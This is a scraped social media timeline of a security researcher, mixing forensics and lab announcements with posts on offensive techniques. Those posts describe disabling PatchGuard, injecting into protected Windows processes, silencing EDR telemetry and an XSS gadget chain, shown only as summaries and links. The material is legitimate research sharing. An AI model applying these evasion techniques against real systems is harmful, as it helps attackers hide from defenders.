Maldev, forensic and reverse makes me happy.
Joined October 2018
- Tweets 157
- Following 159
- Followers 165
- Likes 652
1 Photos and videos
I haven't posted anything about Havoc in a while so imma share something I have been working on. Wrote a custom VM/Interpreter (based on the RISC-V instruction set) to execute exploits and other arbitrary code.
The client is now fully extendable and scriptable via the Python API
28
77
538
71,464
Excited to share my latest article: PgC - a novel approach to disable Patchguard during runtime using basic memory management principles.
It has worked against every version of Patchguard for the last 7 years, without needing any updates!
blog.can.ac/2024/06/28/pgc-g…
14
122
324
47,275
Naacbin retweeted
27 Jun 2024
Didn't check the code yet, but looks like SilverPotato and CertifiedDCOM have a working public weaponized tool by now:
github.com/CICADA8-Research/…
That's huge news from my perspective🔥
5
151
396
27,725
Naacbin retweeted
23 May 2024
I wrote a blogpost on injecting code into a PPL process on Windows 11, without abusing any vulnerable driver.
blog.slowerzs.net/posts/ppls…
3
239
596
49,956
I just published the long-awaited Part 2 to my PCIe blog post series - "All About Memory: MMIO, DMA, TLPs, and more!"
This post also includes a companion experiment where I dive into what pcileech looks like over a PCIe protocol analyzer. Please enjoy!
ctf.re/kernel/pcie/tutorial/…
4
64
201
27,791
Naacbin retweeted
29 Mar 2024
Here is my #Friday #giveaways!
Like, retweet and share with your network... I'll randomly choose on Monday 4/1 two winners to get the full "C5W Certified Malware Analysis" course and certification for FREE... You should not miss this! #DFIR #Malware
academy.cyber5w.com/courses/…
13
108
130
18,604
Exciting news: VolWeb 2.0 is out! This digital forensics memory analysis platform leverages the capabilities of @volatility 3 framework. With significant enhancements, it now offers improved flexibility and scalability! github.com/k1nd0ne/VolWeb.
1/8
4
73
137
14,347
New lab 🏰 for the GOAD project 🥳: SCCM
You can now test the SCCM/MECM attacks locally on Virtualbox or Vmware.
More information here:
mayfly277.github.io/posts/SC…
Repository here : github.com/Orange-Cyberdefen…
Thx again @KenjiEndo15 for your help to building this !
8
142
346
25,979
Naacbin retweeted
21 Mar 2024
I just spent the last few months of my life reverse engineering the Windows 10 parallel loader and figuring out how it does concurrency. Updates have now been published!
github.com/ElliotKillick/win…
2
47
160
11,557
Over the past few months, I've contributed on the github.com/mandiant/VM-Packa… repository to incorporate forensic packages. As a result, I've developed scripts to automate VM installation for reverse, maldev and forensic purposes.
👇
github.com/naacbin/SecLab
12
59
3,524
Naacbin retweeted
3 Feb 2024
I documented github.com/corkami/docs/blob… and made 'low alignment PEs' (PoCs @ github.com/corkami/pocs/blob…) around 2009 but I'm pretty sure this was known before.
Any early case of ITW low-align PE ? cc @Hexacorn @a2_qkumba @hasherezade @rwfpl
7 Jun 2023
First blog post in a while! This article describes an undocumented trick to embed executable code within (what appears to be) a read-only PE section.
secret.club/2023/06/05/spoof…
11
53
9,356
Naacbin retweeted
26 Jan 2024
Challenge time is now over ⏰
TL;DR
- HTML injection
- Axios DOM Based CSPP
- Axios CSPP response overwrite gadget
- jQuery DOM Clobbering CSPP selector overwrite gadgets
- Setting src attr to "javascript:" for each HTML node ➝ XSS
Detailed writeup 👇
mizu.re/post/intigriti-janua…
17 Jan 2024
GG to all the solvers! However, no one solved it in the intended way :p
Before giving my solution, I'm extending the challenge for another week with a fixed version!
If you find the solution, please send me a DM 📮
The challenge is accessible here 👇
mizu.re:3000/
13
79
15,716
OST cannot be stopped. Here is a technique we tested internally 9 months ago: blocking EDR telemetry by leveraging the Windows Filtering Platform. Considered it so evil that we didn't publish it that time. It was pointless, now here it is by @netero_1010: github.com/netero1010/EDRSil…
11
267
868
125,708
Naacbin retweeted
22 Dec 2023
Exegol holiday release is live 🎄🎁🎅
New remote graphical desktop, image entrypoint, container startup script, new tools, improved pipeline, doc, etc. Many big things!
github.com/ThePorgs/Exegol/r…
github.com/ThePorgs/Exegol-i…
gg to the team @Dramelac_ @QU35T_TV 👏 and all contributors.
1
25
111
8,348
Read our latest blog to find out how our Security Research Team reverse-engineered Windows Defender to uncover previously undocumented artefacts, which can now be recovered using Dissect!
blog.fox-it.com/2023/12/14/r…
1
41
76
8,994
I have made 2 writeups for #ECSC2023 and #DGhAck. For the 2nd one, I used github.com/naacbin/CovenantD…
[1] Recovering PDF using DataRun of $LogFile
> naacbin.gitlab.io/data-on-th…
[2] Decrypt empire C2 communication by extracting private key from memory
> naacbin.gitlab.io/empire-c2/
1
7
26
2,575
Time to make @volatility 3 compatible with modern Windows hibernation file analysis.
Blog post : forensicxlab.com/posts/hiber…
Feature : tinyurl.com/5n8u4nr9
Special thanks to @chadtilbury who gave me the motivation and @jtsylve, @vicomarziale, @nolaforensix for the incredible work
1
52
125
14,107
Naacbin retweeted
25 Oct 2023
Excited to launch my first browser extension, DOMLogger ! Now available for both Firefox and Chromium! 🎉
DOMLogger allows you to monitor, intercept, and debug JavaScript sinks based on customizable configurations 🔥
Check it out 👇
github.com/kevin-mizu/domlog…
1/5
9
106
337
42,560
GOAD update available 🥳
- Azure provider is now supported thx to @Zeph_RooT !
- Two versions of the lab are available (A light version with 3 computers has been added).
- Some scripts to help install.
- Refactoring to simplify adding lab and providers.
github.com/Orange-Cyberdefen…
13
146
447
42,362